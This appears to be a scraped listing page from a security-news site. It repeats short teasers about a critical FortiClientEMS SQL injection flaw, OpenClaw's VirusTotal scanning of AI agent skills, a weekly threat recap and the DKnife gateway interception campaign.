Read more →

AI, Breaking News, Exploits, FortiClientEMS, Fortinet, Global Security News, malware, Network Security, Security

Critical Fortinet FortiClientEMS flaw allows remote code execution

Fortinet warns of a critical FortiClientEMS vulnerability that lets remote attackers run malicious code without logging in. Fortinet issued an urgent advisory to address a critical FortiClientEMS vulnerability, tracked as CVE-2026-21643 (CVSS score of 9.1). The vulnerability is an improper neutralization of special elements used in an SQL Command (‘SQL Injection’) issue in FortiClientEMS. An…

Read more →

AI, Breaking News, Exploits, FortiClientEMS, Fortinet, Global Security News, malware, Network Security, Security

Critical Fortinet FortiClientEMS flaw allows remote code execution

Fortinet warns of a critical FortiClientEMS vulnerability that lets remote attackers run malicious code without logging in. Fortinet issued an urgent advisory to address a critical FortiClientEMS vulnerability, tracked as CVE-2026-21643 (CVSS score of 9.1). The vulnerability is an improper neutralization of special elements used in an SQL Command (‘SQL Injection’) issue in FortiClientEMS. An…

Read more →

AI, Breaking News, Exploits, FortiClientEMS, Fortinet, Global Security News, malware, Network Security, Security

Critical Fortinet FortiClientEMS flaw allows remote code execution

Fortinet warns of a critical FortiClientEMS vulnerability that lets remote attackers run malicious code without logging in. Fortinet issued an urgent advisory to address a critical FortiClientEMS vulnerability, tracked as CVE-2026-21643 (CVSS score of 9.1). The vulnerability is an improper neutralization of special elements used in an SQL Command (‘SQL Injection’) issue in FortiClientEMS. An…

Read more →

AI, Breaking News, Exploits, FortiClientEMS, Fortinet, Global Security News, malware, Network Security, Security

Critical Fortinet FortiClientEMS flaw allows remote code execution

Fortinet warns of a critical FortiClientEMS vulnerability that lets remote attackers run malicious code without logging in. Fortinet issued an urgent advisory to address a critical FortiClientEMS vulnerability, tracked as CVE-2026-21643 (CVSS score of 9.1). The vulnerability is an improper neutralization of special elements used in an SQL Command (‘SQL Injection’) issue in FortiClientEMS. An…

Read more →

AI, Apps, Artificial Intelligence, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

OpenClaw Adds VirusTotal Scanning to AI Agent Marketplace

OpenClaw has moved to strengthen security across its fast-growing agent ecosystem by integrating VirusTotal into its ClawHub skill marketplace.  The change follows reports that hundreds of malicious skills were circulating undetected. We “… upload full skill bundles for Code Insight analysis, giving the AI a complete picture of the skill’s behavior rather than just matching…

Read more →

AI, Apps, Artificial Intelligence, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

OpenClaw Adds VirusTotal Scanning to AI Agent Marketplace

OpenClaw has moved to strengthen security across its fast-growing agent ecosystem by integrating VirusTotal into its ClawHub skill marketplace.  The change follows reports that hundreds of malicious skills were circulating undetected. We “… upload full skill bundles for Code Insight analysis, giving the AI a complete picture of the skill’s behavior rather than just matching…

Read more →

AI, Apps, Artificial Intelligence, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

OpenClaw Adds VirusTotal Scanning to AI Agent Marketplace

OpenClaw has moved to strengthen security across its fast-growing agent ecosystem by integrating VirusTotal into its ClawHub skill marketplace.  The change follows reports that hundreds of malicious skills were circulating undetected. We “… upload full skill bundles for Code Insight analysis, giving the AI a complete picture of the skill’s behavior rather than just matching…

Read more →

AI, Apps, Artificial Intelligence, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats

OpenClaw Adds VirusTotal Scanning to AI Agent Marketplace

OpenClaw has moved to strengthen security across its fast-growing agent ecosystem by integrating VirusTotal into its ClawHub skill marketplace.  The change follows reports that hundreds of malicious skills were circulating undetected. We “… upload full skill bundles for Code Insight analysis, giving the AI a complete picture of the skill’s behavior rather than just matching…

Read more →

AI, Exploits, Global Security News, malware

⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

Cyber threats are no longer coming from just malware or exploits. They’re showing up inside the tools, platforms, and ecosystems organizations use every day. As companies connect AI, cloud apps, developer tools, and communication systems, attackers are following those same paths. A clear pattern this week: attackers are abusing trust. Trusted updates, trusted marketplaces, trusted…

Read more →

AI, Cybersecurity, Exploits, Global Security News, malware, Network Security, Risk Management

OpenClaw integrates VirusTotal malware scanning as security firms flag enterprise risks

OpenClaw, the viral open-source AI agent that security firms warn is “insecure by default,” has integrated VirusTotal’s malware scanning into its ClawHub skills marketplace following weeks in which security researchers documented malicious extensions and widespread unauthorized deployments in enterprises. The integration automatically scans all published skills before making them available for download, according to the…

Read more →

AI, Cybersecurity, Exploits, Global Security News, malware, Network Security, Risk Management

OpenClaw integrates VirusTotal malware scanning as security firms flag enterprise risks

OpenClaw, the viral open-source AI agent that security firms warn is “insecure by default,” has integrated VirusTotal’s malware scanning into its ClawHub skills marketplace following weeks in which security researchers documented malicious extensions and widespread unauthorized deployments in enterprises. The integration automatically scans all published skills before making them available for download, according to the…

Read more →

AI, Apps, china, Endpoint, Exploits, Global Security News, malware, Network Security, Network Security, Security

DKnife targets network gateways in long running AitM campaign

A previously undocumented China-linked adversary-in-the-middle (AitM) framework known as “DKnife” has been identified operating at network gateways, where it intercepts and manipulates in-transit traffic. According to Cisco Talos’ findings, the framework has been active since at least 2019 and remains operational as of early 2026. Rather than targeting endpoints directly, DKnife is deployed at the…

Read more →